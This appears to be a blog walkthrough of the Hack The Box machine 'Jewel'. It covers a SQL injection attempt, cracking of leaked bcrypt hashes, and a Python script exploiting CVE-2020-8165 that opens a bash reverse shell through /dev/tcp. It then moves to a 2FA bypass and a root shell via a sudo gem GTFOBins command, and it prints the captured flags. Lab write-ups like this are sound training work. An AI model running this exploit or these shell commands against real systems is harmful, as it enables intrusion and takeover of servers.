Hack-The-Box-walkthrough[jewel]

Posted on Edited on In Views: Word count in article: 1.4k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 10 Oct 2020
IP: 10.10.10.211

User Blood haqpl 00 days, 01 hours, 43 mins, 28 seconds.
Root Blood Ziemni 00 days, 02 hours, 59 mins, 53 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
root@kali:~/hackthebox/machine# nmap -sV -p- -v --min-rate=10000 10.10.10.211
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
8000/tcp open  http    Apache httpd 2.4.38
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • ngnix and phusion passanger exploit is not found, creating a account
  • Profile picture cannot be changed so no chance of file upload vuln
  • Cannot create a content so injections might not be possible
  • Enumerated Dirs:
1
2
3
4
5
6
7
/login (Status: 200)
/users (Status: 500)
/404 (Status: 200)
/articles (Status: 200)
/signup (Status: 200)
/500 (Status: 200)
/422 (Status: 200)
  • Nothing intresting movin on to port 8000
  • obtained users jennifer and bill has the password, spongebob
  • sql testing in login, payload
1
' 1 or 1 = 1 -- -
  • Username was not valild, the sql query in the password field got accepted
  • Logging in with the username, test_wr3nch and password [‘ or 1 = 1 – -]

(username is changed, cause its not valid)

Port 8000

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/hackthebox/machine/jewel# curl --head http://jewel.htb:8000/ -L
HTTP/1.1 302 Found
Date: Wed, 14 Oct 2020 08:56:30 GMT
Server: Apache/2.4.38 (Debian)
Location: http://jewel.htb:8000/gitweb/
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 200 OK
Date: Wed, 14 Oct 2020 08:56:42 GMT
Server: Apache/2.4.38 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
  • No apache exploits in searchsploit
  • Hosts gitweb. (gitweb, web frontend to git repostories)
1
2
<!-- git web interface version 2.20.1, (C) 2005-2006, Kay Sievers <kay.sievers@vrfy.org>, Christian Gierke -->
<!-- git core binaries version 2.20.1 -->
  • A simple console.log() in app/assets/javascripts/application.js
1
console.log("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  • Got a hint from za10bx#3725 as redis
  • Looking deeper in the gitweb
  • db has a schema and a file that says everything is default
  • lib has nothing
  • log has nothing
  • public directory has the things enumerated via dir enumeration
  • storage has nothing
  • test has nothing
  • tmp has nothing
  • vendor has nothing

bd.sql file, which is a postgresql database dump from debian 11 has

1
2
3
4
5
6
7
8
9
10
1 bill bill@mail.htb

2020-08-25 08:13:58.662464 2020-08-25 08:13:58.662464 

$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
2 jennifer jennifer@mail.htb

2020-08-25 08:54:42.8483 2020-08-25 08:54:42.8483 

$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
  • Config.ru has nothing
  • In the Gemfile, Redis is inolved as a gem

Got creds from port 8000, back to port 8080

1
2
3
4
5
6
7
8
root@kali:~/hackthebox/machine/jewel# john -format=bcrypt hashes -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Session completed
Password obtained: spongebob

get usershell

  • looking at the redis / ruby cve

  • the cve-2020-8165 https://github.com/masahiro331/CVE-2020-8165

  • Looking at the PoC

1
curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%15%60touch+%2Ftmp%2Frce%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
  • While decoding it, we get
1
localhost:3000/users?new=o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy	:@instanceo:ERB:	@srcI"`touch /tmp/rce`:ET:@filenameI"1;	T:@linenoi:@method:result:	@varI"@result;	T:@deprecatorIu:ActiveSupport::Deprecation

  • Ok we have our payload, where do we inject it.. ? the only available places are login, signup and edit profile, login and signup gives error so that leaves with the edit profile,

  • While editing the username, capture the request in the burp and send it to
    repeater. in the username paramater inject the url encoded payload and forward the request twice

  • refresh the http://jewel.htb/8080/articles twice while listening on the specified port, to obtain a reverse shell

  • or easily using the following python3 script

getuser.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import requests
import re
import sys
 
URL='http://{}:8080'.format(sys.argv[1])
username='myuser4'
password='mypass4'
email='myuser4@mail.com'
 
if len(sys.argv) != 4:
    print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 9001")
    exit(0)
 
s = requests.Session()
 
resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'
 
token = re.search(rx,resp.text).group(1)
 
# create user
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)
 
# login
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)
 
rx = r'href="/users/(.*)"'
user_id = re.search(rx,resp.text).group(1)
 
# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'
 
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)
 
s.get(URL + '/articles')
1
root@kali:~/hackthebox/machine/jewel# python3 getuser.py 10.10.10.211 10.10.14.3 3344

get a shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.211.
Ncat: Connection from 10.10.10.211:47546.
bash: cannot set terminal process group (791): Inappropriate ioctl for device
bash: no job control in this shell
bill@jewel:~/blog$ id
id
uid=1000(bill) gid=1000(bill) groups=1000(bill)
bill@jewel:~/blog$ whoami
whoami
bill
bill@jewel:~/blog$ cd ~
cd ~
bill@jewel:~$ ls
ls
blog
user.txt
bill@jewel:~$ cat user.txt
cat user.txt
b7c9e7532dda57b2362495bd05367fb0

get rootshell

  • After obtaining the shell, run enumeration scripts LinEnum.sh
  • After enumerating scripts, found nothing intresting. The sudo version enumerated is that version 1.8.27, checking for its exploits lead to sudo 1.8.27 - Security Bypass https://www.exploit-db.com/exploits/47502
  • After going through the report, since we have the passsword that is cracked “spongebob” lets sudo -l it
  • sudo -l asks for a password which is normal, and asks something verification code.
  • ls -la the bills home directory reveals a hidden file .google_authenticator
  • cat the google authentication file has a secret key/hash in it. We can find the verification code with the secret hash
1
2
3
4
5
bill@jewel:~$ cat .google_authenticator
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
  • We used the Google Chromimum with an addon, GAuth Authenticator https://chrome.google.com/webstore/detail/gauth-authenticator/ilgcnhelpchnceeipipijaljkblbcobl to do the
    task
  • We pasted the secret hash to the addon and it provided the OTP, with that we can sudo -l, and the /usr/bin/gem is available to be run as sudo
1
2
3
4
5
6
7
8
9
10
11
12
13
bill@jewel:~$ sudo -l 
sudo -l
[sudo] password for bill: spongebob

Verification code: 437542

Matching Defaults entries for bill on jewel:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    insults

User bill may run the following commands on jewel:
    (ALL : ALL) /usr/bin/gem
  • with the gem GTFOBins https://gtfobins.github.io/gtfobins/gem, we are able to obtain the reverse shell
  • sudo /usr/bin/gem open -e “/bin/sh -c /bin/sh” rdoc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
bill@jewel:~$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# cd ~
cd ~
# ls
ls
root.txt
# cat root.txt
cat root.txt
458f634ac19fdd93ba6027a8cbe34197

  • root.txt is obtained

Summary of knowledge

  • gitweb .sql leak pass hash
  • john crack bcrypt hash
  • write cve-2020-8165 exploit python3 script
  • use google_authenticator hash of Google Chromimum addon GAuth Authenticator to get the verification code
  • gem GTFOBins privesclation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…